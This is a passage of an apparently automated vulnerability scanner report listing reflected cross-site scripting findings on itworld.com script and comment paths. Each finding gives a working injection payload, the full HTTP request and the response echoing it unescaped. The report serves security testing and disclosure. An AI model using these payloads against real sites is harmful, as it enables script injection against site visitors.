Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:19 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460499"
Content-Type: text/html; charset=utf-8
Content-Length: 57514
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:21 GMT
X-Varnish: 1038165682
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/kickapps57697"><script>alert(1)</script>bd8827fba4e/isfollowing-comments/204223"/>
...[SNIP]...

1.104. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /kickapps/isfollowing-comments/204223

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0b86"-alert(1)-"318990c4788 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /kickapps/isfollowing-commentsd0b86"-alert(1)-"318990c4788/204223 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-2; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dblog%253A204223%253ACyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%253A2011-09-16%7C1316480024395%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460534"
Content-Type: text/html; charset=utf-8
Content-Length: 57294
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:54 GMT
X-Varnish: 1038166828
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/kickapps/isfollowing-commentsd0b86"-alert(1)-"318990c4788/204223";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13=
...[SNIP]...

1.105. http://www.itworld.com/kickapps/isfollowing-comments/204223 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /kickapps/isfollowing-comments/204223

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cace"><script>alert(1)</script>a5d54e87003 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /kickapps/isfollowing-comments1cace"><script>alert(1)</script>a5d54e87003/204223 HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: application/json, text/javascript, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: http://www.itworld.com/it-managementstrategy/204223/cyber-harassers-you-can-hide-you-can-t-run
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; mobify=0; __switchTo5x=56; __unam=dad84f1-13284325649-54133fa9-2; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_ppv%3D0%3B%20s_sq%3D%3B; s_pers=%20s_pv%3Dblog%253A204223%253ACyber%2520harassers%253A%2520You%2520can%2520hide%252C%2520but%2520you%2520can%25u2019t%2520run%253A2011-09-16%7C1316480024395%3B; __utma=222989251.1353402908.1316477884.1316477884.1316477884.1; __utmb=222989251; __utmc=222989251; __utmz=222989251.1316477884.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:28:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460529"
Content-Type: text/html; charset=utf-8
Content-Length: 57514
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:28:50 GMT
X-Varnish: 1038166698
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/kickapps/isfollowing-comments1cace"><script>alert(1)</script>a5d54e87003/204223"/>
...[SNIP]...

1.106. http://www.itworld.com/misc/collapse.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/collapse.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c2ca"><script>alert(1)</script>ad0f3711ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc8c2ca"><script>alert(1)</script>ad0f3711ac/collapse.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:30 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459970"
Content-Type: text/html; charset=utf-8
Content-Length: 57319
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:34 GMT
X-Varnish: 1959721384
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/misc8c2ca"><script>alert(1)</script>ad0f3711ac/collapse.js?h"/>
...[SNIP]...

1.107. http://www.itworld.com/misc/collapse.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/collapse.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 311ce"-alert(1)-"8c81159bfd0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc311ce"-alert(1)-"8c81159bfd0/collapse.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:54 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459994"
Content-Type: text/html; charset=utf-8
Content-Length: 57109
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:58 GMT
X-Varnish: 1959722250
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...

s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/misc311ce"-alert(1)-"8c81159bfd0/collapse.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eV
...[SNIP]...

1.108. http://www.itworld.com/misc/collapse.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/collapse.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 742bc"><script>alert(1)</script>22dbf7e6ab7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/collapse.js742bc"><script>alert(1)</script>22dbf7e6ab7?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:16 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460016"
Content-Type: text/html; charset=utf-8
Content-Length: 57330
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:35 GMT
X-Varnish: 1959722827
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/misc/collapse.js742bc"><script>alert(1)</script>22dbf7e6ab7?h"/>
...[SNIP]...

1.109. http://www.itworld.com/misc/collapse.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/collapse.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98271"-alert(1)-"f1cfa216a3f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/collapse.js98271"-alert(1)-"f1cfa216a3f?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:49 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460049"
Content-Type: text/html; charset=utf-8
Content-Length: 57110
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:21:12 GMT
X-Varnish: 1959723951
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
MS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/misc/collapse.js98271"-alert(1)-"f1cfa216a3f";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.110. http://www.itworld.com/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a0e5"-alert(1)-"3ff1e116ef7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc2a0e5"-alert(1)-"3ff1e116ef7/drupal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:18:06 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459886"
Content-Type: text/html; charset=utf-8
Content-Length: 57062
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:18:08 GMT
X-Varnish: 398317385
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=39a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...

s.prop13="CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/misc2a0e5"-alert(1)-"3ff1e116ef7/drupal.js";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar
...[SNIP]...

1.111. http://www.itworld.com/misc/drupal.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7939"><script>alert(1)</script>8c5ec2b0969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misce7939"><script>alert(1)</script>8c5ec2b0969/drupal.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:17:58 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459878"
Content-Type: text/html; charset=utf-8
Content-Length: 57314
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:17:59 GMT
X-Varnish: 398317009
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=39a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/misce7939"><script>alert(1)</script>8c5ec2b0969/drupal.js?h"/>
...[SNIP]...

1.112. http://www.itworld.com/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8904"><script>alert(1)</script>2c73712fcd7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc/drupal.jsd8904"><script>alert(1)</script>2c73712fcd7?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:18:52 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459932"
Content-Type: text/html; charset=utf-8
Content-Length: 57310
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:18:55 GMT
X-Varnish: 1959720432
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/misc/drupal.jsd8904"><script>alert(1)</script>2c73712fcd7?h"/>
...[SNIP]...

1.113. http://www.itworld.com/misc/drupal.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/drupal.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d854d"-alert(1)-"e377c0232e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc/drupal.jsd854d"-alert(1)-"e377c0232e0?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:51 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459991"
Content-Type: text/html; charset=utf-8
Content-Length: 57089
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:54 GMT
X-Varnish: 1959722147
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
"CMS";
s.prop14="kgerich";
s.prop15="2008-06-20";
s.prop16="";
s.prop17="";
s.prop18="Anonymous";
s.prop19="";
s.prop20="";
s.prop29="";
s.prop30="";
s.prop34="";
s.prop35="";
s.prop45="/misc/drupal.jsd854d"-alert(1)-"e377c0232e0";
s.events="";
s.products="";
s.eVar1="";
s.eVar2="page";
s.eVar3="";
s.evar4="";
s.eVar9="";
s.eVar10="";
s.eVar11="53238";
s.eVar12="Oops! We couldn't find the page you requested.";
s.eVar13="CMS";

...[SNIP]...

1.114. http://www.itworld.com/misc/textarea.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/textarea.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a76a"><script>alert(1)</script>2ff991c1d2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /misc9a76a"><script>alert(1)</script>2ff991c1d2a/textarea.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:19:29 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316459969"
Content-Type: text/html; charset=utf-8
Content-Length: 57329
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:19:45 GMT
X-Varnish: 1959721373
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Set-Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822; Path=/; Max-age=600

<!DOCTYPE HTML>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">

<head>
<me
...[SNIP]...
<meta name="syndication-source" content="http://www.itworld.com/misc9a76a"><script>alert(1)</script>2ff991c1d2a/textarea.js?h"/>
...[SNIP]...

1.115. http://www.itworld.com/misc/textarea.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.itworld.com
Path:   /misc/textarea.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8840a"-alert(1)-"5fcf5a7dc49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /misc8840a"-alert(1)-"5fcf5a7dc49/textarea.js?h HTTP/1.1
Host: www.itworld.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.itworld.com/
Cookie: BNI__BARRACUDA_LB_COOKIE=38a4a8c00000b822

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (EL)
X-Powered-By: PHP/5.2.16
Cache-Control: public, max-age=0
Last-Modified: Mon, 19 Sep 2011 19:20:02 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1316460002"
Content-Type: text/html; charset=utf-8
Content-Length: 57110
X-Cacheable: NO: obj.status
X-Cacheable-status: 404
Date: Mon, 19 Sep 2011 19:20:05 GMT
X-Varnish: 1959722521
Age: 0
